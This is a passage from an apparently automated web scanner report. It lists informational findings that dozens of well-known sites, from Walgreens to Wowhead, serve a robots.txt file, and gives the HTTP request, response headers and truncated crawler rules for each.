ETag: "20d84ea91951cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP CURa ADMa TAla OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:55:50 GMT
Connection: keep-alive
Content-Length: 5663

User-agent: *
disallow: /36flip/
disallow: /36flip/
disallow: /admin/
disallow: /Admin/
disallow: /adsandtps/
disallow: /Adsandtps/
disallow: /beta/
disallow: /Beta/
disallow: /custom/
disallow: /Cust
...[SNIP]...
24.897. http://www.walgreens.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walgreens.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.walgreens.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Sep 2010 23:45:49 GMT
Accept-Ranges: bytes
Content-Length: 943
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:31:00 GMT
Connection: close

# Robots.txt exclusion for walgreens.com

User-agent: *

Disallow: /common/
Disallow: /emailsignup/
Disallow: /includes/
Disallow: /library/checkdrug/
Disallow: /logout.jsp
Disallow: /messaging/
Disal
...[SNIP]...
24.898. http://www.walletpop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walletpop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.walletpop.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:28 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 322
Keep-Alive: timeout=5, max=999818
Connection: Keep-Alive
Content-Type: text/plain

User-Agent: *
Disallow: /forward
Disallow: /traffic
Disallow: /mm_track
Disallow: /_uac/adpage.html
Disallow: /*?*a=ajax-comment-vote
Disallow: /*?*a=ajax-comment-show-replies
Disallow: /forwar
...[SNIP]...
24.899. http://www.walmart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walmart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.walmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15
Last-Modified: Sat, 02 Apr 2011 02:58:17 GMT
ETag: "16c1c-d0-49fe6b2c549df"
Content-Type: text/plain; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 12:37:43 GMT
Content-Length: 208
Connection: close
Set-Cookie: dcenv=edc; path=/; domain=walmart.com

#go away
User-agent: *
Sitemap: http://www.walmart.com/Sitemap_Index.xml
Sitemap: http://www.walmart.com/EndecaBrowse_Sitemap_Index.xml
# Disallow the following URLs
Disallow: /solutions
Disallow: /cs
...[SNIP]...
24.900. http://www.wapedia.mobi/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wapedia.mobi
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wapedia.mobi

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Type: text/plain
Set-Cookie: SERVERID=srv106; path=/
Content-Length: 1019
Server: Wapedia
Date: Sat, 02 Apr 2011 13:43:43 GMT
X-Varnish: 1919134966
Age: 0
Via: 1.1 varnish
Connection: close


User-agent: Mediapartners-Google
Allow: /

User-Agent: taptubot
Allow: /


User-agent: thesubot
Disallow: /

User-Agent: OmniExplorer_Bot
Disallow: /


User-agent: Teleport*
Disallow: /

User-age
...[SNIP]...
24.901. http://www.warnerbros.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.warnerbros.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.warnerbros.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:02 GMT
Server: Apache
X-WBOL-WebServer: www_us
Set-cookie: WBWTID=173.193.214.243-4D972552245000006D50D6D-www-wb-web07; path=/; expires=Friday, 01-Jan-10 12:00:00 GMT; domain=.warnerbros.com;
Last-Modified: Tue, 06 Apr 2010 19:35:42 GMT
ETag: "6174ad-8e-8d12df80"
Accept-Ranges: bytes
Content-Length: 142
Connection: close
Content-Type: text/plain

# robots.txt for http://www.warnerbros.com/
User-agent: *
Allow: /
Disallow: /landing    #Do not show the landing directory in search results
24.902. http://www.washingtonpost.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.washingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 15 Mar 2011 17:26:26 GMT
Content-Type: text/plain; charset=UTF-8
X-Cnection: close
Cache-Control: must-revalidate, max-age=539
Date: Sat, 02 Apr 2011 12:43:09 GMT
Content-Length: 1048
Connection: close

User-agent: ia_archiver
Disallow: /

User-agent: *
Crawl-delay: 1

# Disallow facets
Disallow: /*_print.html
Disallow: /*_email.html
Disallow: /*_singlePage.html
Disallow: /*_allComments.htm
...[SNIP]...
24.903. http://www.weather.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weather.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:29 GMT
Last-Modified: Fri, 04 Jun 2010 15:15:07 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Server: Apache
SVRNAME: web2x11
Vary: Accept-Encoding
Content-Length: 305
Connection: close

# /robots.txt
User-agent: *
Disallow: /cgi-bin
Disallow: /fcgi-bin
Disallow: /interact/photogallery/results.html
Disallow: /interact/photogallery/details.html
Disallow: /RealMedia
Disallow: /search/pa
...[SNIP]...
24.904. http://www.weather.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weather.gov

Response

HTTP/1.0 200 OK
Age: 126
X-Cache-TTL: 774
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:27:35 GMT
Content-Length: 86
Content-Type: text/plain; charset=iso-8859-1
Expires: Sat, 02 Apr 2011 13:42:35 GMT
Cache-Control: max-age=900
Server: Apache
Last-Modified: Tue, 01 May 2007 20:14:58 GMT
Vary: Accept-Encoding
Via: 1.1 nws-hq-cache03 (NetCache NetApp/6.0.7)
X-Cached-Time: Sat, 02 Apr 2011 13:27:35 GMT

User-agent: *
Disallow: /cgi-bin/
Disallow: /om/tropical/
Disallow: /xml/SOAP_server/
24.905. http://www.weatherbug.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weatherbug.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weatherbug.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2003.04.18T03:21-0400" exp "2004.04.18T12:00-0400" r (v 0 s 0 n 0 l 0))
P3P: CP="NOI DSP COR NID TAI STP UNI"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:44:05 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Wed, 02 Jan 2008 17:51:54 GMT
ETag: "8c9f4929684dc81:811"
Content-Length: 25

User-agent: *
Disallow:
24.906. http://www.webcrawler.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webcrawler.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webcrawler.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 14 Jan 2011 22:46:26 GMT
Accept-Ranges: bytes
ETag: "04dae03cb4cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:43:35 GMT
Connection: close
Content-Length: 688

# We are overwhelmed by MSN Bots
User-agent: msnbot-media/1.1 ( http://search.msn.com/msnbot.htm)
Crawl-delay: 30

User-agent: msnbot/1.1 ( http://search.msn.com/msnbot.htm)
Crawl-delay: 30

Us
...[SNIP]...
24.907. http://www.webgains.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webgains.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webgains.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:54 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 22 Sep 2009 08:50:37 GMT
ETag: "260e38-43-47426b12df140"
Accept-Ranges: bytes
Content-Length: 67
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:/components/
Disallow:/ewp/
Disallow:/mc/
24.908. http://www.webmd.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webmd.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webmd.com

Response

HTTP/1.1 200 OK
Content-Length: 134
Content-Type: text/plain
Content-Location: http://www.webmd.com/robots.txt
Last-Modified: Tue, 19 Aug 2008 19:19:28 GMT
Accept-Ranges: bytes
ETag: "060a57f302c91:d8b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:38:03 GMT
Connection: keep-alive

# Robots.txt file WebMD
# Updated: Jan 2007

User-agent: *
Disallow: /404
Disallow: /500
Disallow: /search/search_results/
24.909. http://www.webring.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webring.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webring.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:40 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 12 May 2010 16:07:34 GMT
ETag: "2c30aee-ce-d7049d80"
Accept-Ranges: bytes
Content-Length: 206
Connection: close
Content-Type: text/plain

Sitemap: http://www.webring.com/sitemap.xml
User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow:

# Rover is the spawn of satan <http://www.roverbot.com>
User-agent: Roverbot
Disall
...[SNIP]...
24.910. http://www.webs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webs.com

Response

HTTP/1.1 200 OK
Set-Cookie: FW_PIN_HASH=R728969413; path=/
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 1077
Date: Sat, 02 Apr 2011 13:31:27 GMT
Connection: close

User-Agent: *
Allow: /*?$
Allow: /s/signup
Allow: /Signup
Disallow: /*?
Allow: /.htm
Disallow: /s/signup/templates*
Disallow: /Misc/
Disallow: /images.htm
Disallow: /Premium/
Disallow: /BlogB/
Disallo
...[SNIP]...
24.911. http://www.webshots.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webshots.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webshots.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:38 GMT
Server: Apache/2.0
Last-Modified: Tue, 09 Nov 2010 20:41:00 GMT
ETag: "56"
Accept-Ranges: bytes
Content-Length: 86
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=88
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /scripts/
Disallow: /cgi-bin/
Disallow: /s/
Disallow: /search
24.912. http://www.weightwatchers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weightwatchers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weightwatchers.com

Response

HTTP/1.1 200 OK
Content-Length: 175
Content-Type: text/plain
Last-Modified: Wed, 24 Nov 2010 20:56:51 GMT
Accept-Ranges: bytes
ETag: "4293e1e1a8ccb1:247"
CP: CAO DSP CURa ADMa DEVa TAIa PSAa IVAa CONi OTPa OUR SAMa STP PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:38 GMT
Connection: close

User-agent: *
Disallow: /monthlypass/signup.aspx
Disallow: /monthlypasscancellation
Disallow: /SiteRequirements.aspx
Disallow: /templates/marketing/Landing_1col_nonav.aspx
24.913. http://www.wellness.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wellness.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wellness.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 12:17:50 GMT
Server: Microsoft-IIS/6.0
Cache-Control: max-age=2592000
Content-Length: 404
Content-Type: text/plain
Last-Modified: Fri, 25 Mar 2011 18:45:20 GMT
Accept-Ranges: bytes
ETag: ""
X-Powered-By: ASP.NET
Age: 4561
X-Cache: HIT from squid3.earnware.corp
X-Cache-Lookup: HIT from squid3.earnware.corp:80
Via: 1.0 wellness.com, 1.0 squid3.earnware.corp (squid)
Connection: close

User-agent: *
Visit-time: 1800-0400

Disallow: /chirobycity/
Disallow: /deb/
Disallow: /new/
Disallow: /archive/
Disallow: /pics/
Disallow: /search/
Disallow: /burst/
Disallow: /manager/
Di
...[SNIP]...
24.914. http://www.wellsfargo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wellsfargo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wellsfargo.com

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Sat, 02 Apr 2011 12:43:52 GMT
Content-length: 6797
Content-type: text/plain
Set-Cookie: v1st=5EDD4CEB1FE4A5C5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Last-modified: Fri, 11 Feb 2011 13:31:40 GMT
Accept-ranges: bytes
Connection: close

# robots.txt for www.wellsfargo.com
# Last generated Tue May 1 09:06:35 2001
User-agent: *
Disallow: /ads/
Disallow: /akamai/
Disallow: /auxiliary_access/
Disallow: /bop/
Disallow: /browser/
Disallow
...[SNIP]...
24.915. http://www.wendys.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wendys.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wendys.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:08 GMT
Server: Apache
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301753948.392078; expires=Tue, 30-Mar-2021 14:19:08 GMT; path=/
Content-Length: 66
Last-Modified: Tue, 28 Sep 2010 19:38:46 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: BIGipServerpool-x-www.wendys.com=751369994.4391.0000; path=/

# block crawling of promos folder
User-agent: *
Disallow: /promo/
24.916. http://www.wetpaint.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wetpaint.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wetpaint.com

Response

HTTP/1.1 200 OK
Age: 110207
Cache-Control: max-age=2592000
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:58:42 GMT
Expires: Sun, 01 May 2011 07:21:54 GMT
Last-Modified: Mon, 06 Dec 2010 19:47:54 GMT
Server: prod7
Vary: Accept-Encoding
X-Cache: HIT
X-Cache-Hits: 670
Content-Length: 399
Connection: Close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...
24.917. http://www.where2getit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.where2getit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.where2getit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:34 GMT
Server: Apache/2.2.13 (Linux/SUSE)
Last-Modified: Tue, 23 Mar 2010 18:34:51 GMT
ETag: "13d97b-18-4827c11bcd608"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
24.918. http://www.whitepages.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitepages.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.whitepages.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/plain; charset=utf-8
Date: Sat, 02 Apr 2011 12:38:13 GMT
Status: 200 OK
X-Runtime: 0.00808
ETag: "265a1e0dd0ef30685663e39bf1ecd640"
Connection: close
Set-Cookie: search_beta_test_110331=1; domain=.whitepages.com; path=/; expires=Mon, 02 Apr 2012 12:38:13 GMT
Set-Cookie: wp_endemic_provider=C; domain=.whitepages.com; path=/; expires=Sun, 03 Apr 2011 00:38:13 GMT
Set-Cookie: wp_perm=pid%3DE1OQHF0mEeCF8QAbeC_z-g; domain=.whitepages.com; path=/; expires=Sun, 01 Apr 2012 12:38:13 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.whitepages.com; path=/; expires=Sun, 01 Apr 2012 12:38:13 GMT
Set-Cookie: _wpn_sid=ed61cee5256cecd04646b5f6c89cb2b5; domain=.whitepages.com; path=/
Content-Length: 1006

User-agent: *
Disallow: /dir/*/*/*/
Disallow: /dir*?
Disallow: /*search/Replay
Disallow: /*search/FindAreacode
Disallow: /*search/ReverseAreacode
Disallow: /*search/FindZip
Disallow: /*search/ReverseZ
...[SNIP]...
24.919. http://www.wikia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wikia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wikia.com

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/plain
X-Pass-Cache-Control: max-age=86400
X-Cacheable: YES
Content-Length: 3197
Date: Sat, 02 Apr 2011 12:43:57 GMT
Connection: close
X-Served-By: varnish-s3-SJC, varnish-v12-ASH
X-Cache: HIT, HIT
X-Cache-Hits: 3, 44
X-Timer: S1301748237.132179022,VS0,VE0
Vary: Accept-Encoding
Set-Cookie: Geo = {"city":"Dallas","country":"US","continent":"NA"}; path=/
X-Age: 76945
Cache-Control: max-age=86400

#
# Please note: There are a lot of pages on this site, and there are
# some misbehaved spiders out there that go _way_ too fast. If you're
# irresponsible, your access to the site may be blocked.
#


...[SNIP]...
24.920. http://www.wikimapia.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wikimapia.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wikimapia.org

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Sat, 02 Apr 2011 13:44:59 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Last-Modified: Sun, 09 May 2010 16:25:13 GMT
ETag: "a690a4e-23e-4be6e1e9"
Accept-Ranges: bytes
Content-Length: 574

User-agent: *
Disallow: /edit_wiki3.php
Disallow: /edit_wiki4.php
Disallow: /edit_wiki5.php
Disallow: /save3.php
Disallow: /save4.php
Disallow: /sys/
Disallow: /sys/edit_wiki3/
Disallow: /sys/edit_wik
...[SNIP]...
24.921. http://www.wikimedia.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wikimedia.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wikimedia.org

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:03:08 GMT
Server: Apache
Last-Modified: Sat, 18 Apr 2009 13:54:29 GMT
ETag: "3f2c-467d4a2ce4f40"
Accept-Ranges: bytes
Content-Length: 16172
Content-Type: text/plain
Age: 1717
X-Cache: HIT from sq76.wikimedia.org
X-Cache-Lookup: HIT from sq76.wikimedia.org:3128
X-Cache: MISS from sq71.wikimedia.org
X-Cache-Lookup: MISS from sq71.wikimedia.org:80
Connection: close

#
# robots.txt for http://www.wikipedia.org/ and friends
#
# Please note: There are a lot of pages on this site, and there are
# some misbehaved spiders out there that go _way_ too fast. If you're
# i
...[SNIP]...
24.922. http://www.wikio.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wikio.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wikio.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:04 GMT
Server: Apache/2.2.3 (Debian) mod_jk/1.2.18
Last-Modified: Fri, 25 Mar 2011 14:04:42 GMT
ETag: "c3b-49f4f134eb280"
Accept-Ranges: bytes
Content-Length: 3131
Cache-Control: max-age=43200, private
Expires: Sun, 03 Apr 2011 01:58:04 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *


Disallow: /books/
Disallow: /dvd/
Disallow: /cd/
Disallow: /cds/
Disallow: /book/
Disallow: /dvds/

Disallow: /video/vote/
Disallow: /*sort1.html
Disallow: /*sort2.html
Disallow: /add

...[SNIP]...
24.923. http://www.wimp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wimp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wimp.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1232961772"
Last-Modified: Sun, 07 Mar 2010 11:27:13 GMT
Content-Length: 85
Connection: close
Date: Sat, 02 Apr 2011 13:26:05 GMT
Server: lighttpd/1.4.28

User-agent: Mediapartners-Google
Disallow:

User-agent: ia_archiver
Disallow: /
24.924. http://www.winbuyer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winbuyer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.winbuyer.com

Response

HTTP/1.1 200 OK
Content-Length: 57
Content-Type: text/plain
Last-Modified: Thu, 06 Jan 2011 11:42:30 GMT
Accept-Ranges: bytes
ETag: "fadc12cd96adcb1:925"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:41:52 GMT
Connection: close

User-agent: *
Disallow: /gHendlers/
Disallow: /admin/
24.925. http://www.wired.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wired.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "19501a732beb69ddfb1b0016c2f03e37:1298400827"
Last-Modified: Tue, 22 Feb 2011 18:53:47 GMT
Accept-Ranges: bytes
Content-Length: 1701
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:40:15 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin/
Disallow: /user/
Disallow: /templatedata/
Disallow: /partnerfeeds/
Disallow: /magazine/polls/
Disallow: /services/emailFriend
Disallow: headerSubscribe
Disallow: inc
...[SNIP]...
24.926. http://www.wisegeek.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wisegeek.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wisegeek.com

Response

HTTP/1.0 200 OK
Connection: close
Date: Sat, 02 Apr 2011 13:23:34 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny4 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Wed, 27 Oct 2010 09:51:45 GMT
ETag: "77cbe0-114-493962c552e40"
Accept-Ranges: bytes
Content-Length: 276
Content-Type: text/plain

Sitemap: http://www.wisegeek.com/sitemap-index.xml.gz

User-agent: *
Disallow: /s/
Disallow: /templates/
Disallow: /d/
Disallow: /topics/
Disallow: /related/
Disallow: /relevant/

User-Agent: MediaPa
...[SNIP]...
24.927. http://www.wix.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wix.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wix.com

Response

HTTP/1.0 200 OK
X-Via-Node: sputnik5
Date: Sat, 02 Apr 2011 13:42:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=143019707EC67889193E85226D250F98; Path=/
Content-Language: en-US
Content-Length: 569
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:42:09 GMT
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close


User-agent: Googlebot
Disallow: /api/
Disallow: /bo/
Disallow: /editor.jsp
Disallow: /noflashhtml
Disallow: /siteBackHtml
Disallow: /wix/
Disallow: /wixpress/
Disallow: /wixdemo/

...[SNIP]...
24.928. http://www.womansday.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.womansday.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.womansday.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 27 Jul 2010 04:15:04 GMT
Accept-Ranges: bytes
Content-Length: 236
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:04:48 GMT
Connection: close

User-agent: *
Disallow: /layout/set/print/
Disallow: /sandbox/
Disallow: /content/
Disallow: /Blogs/
Disallow: /Blogs/Editor-s-Blog/
Disallow: /Blogs/Blogs-Calendar/

Sitemap: http://www.wom
...[SNIP]...
24.929. http://www.wonderhowto.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wonderhowto.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wonderhowto.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 13:45:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1memql45ho3s3r55iwh3txyh; domain=.wonderhowto.com; path=/; HttpOnly
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 432

User-agent: *
Disallow: /promo/
Disallow: /js/
Disallow: /css/
Disallow: /ajax/
Disallow: /a/
Sitemap: http://www.wonderhowto.com/sitemap.xml
Sitemap: http://www.wonderhowto.com/videositemap.xm
...[SNIP]...
24.930. http://www.worldwinner.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldwinner.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.worldwinner.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:16 GMT
Server: Apache
Last-Modified: Wed, 09 Mar 2005 19:16:12 GMT
Accept-Ranges: bytes
Content-Length: 311
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR NID TAIi OUR NOR CNT", CP="NOI DSP COR NID TAIi OUR NOR CNT"
Content-Type: text/plain
Connection: close

# robots.txt worldwinner.com
# $Id: robots.txt,v 1.5 2005-03-09 19:16:11 danh Exp $

User-agent: *
Disallow: /cgi/finance
Disallow: /cgi/guestplay
Disallow: /cgi/tournament
Disallow: /cgi/newuser_chec
...[SNIP]...
24.931. http://www.worthpoint.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worthpoint.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.worthpoint.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:55 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: wp_session=173.193.214.243.1301751475801978; path=/; domain=.worthpoint.com
Last-Modified: Mon, 15 Nov 2010 20:59:31 GMT
ETag: "17b8003-204-4951db76ff2c0"
Accept-Ranges: bytes
Content-Length: 516
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# All robots Block
User-agent: *
Disallow: /profile
Disallow: /login
Disallow: /classfied
Disallow: /auctionhsad
Disallow: /mainCalendar
Disallow: /search
Disallow: /user
Disallow: /worthopedia/*/pric
...[SNIP]...
24.932. http://www.wowhead.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wowhead.com
Path:   /favicon.ico

Issue detail
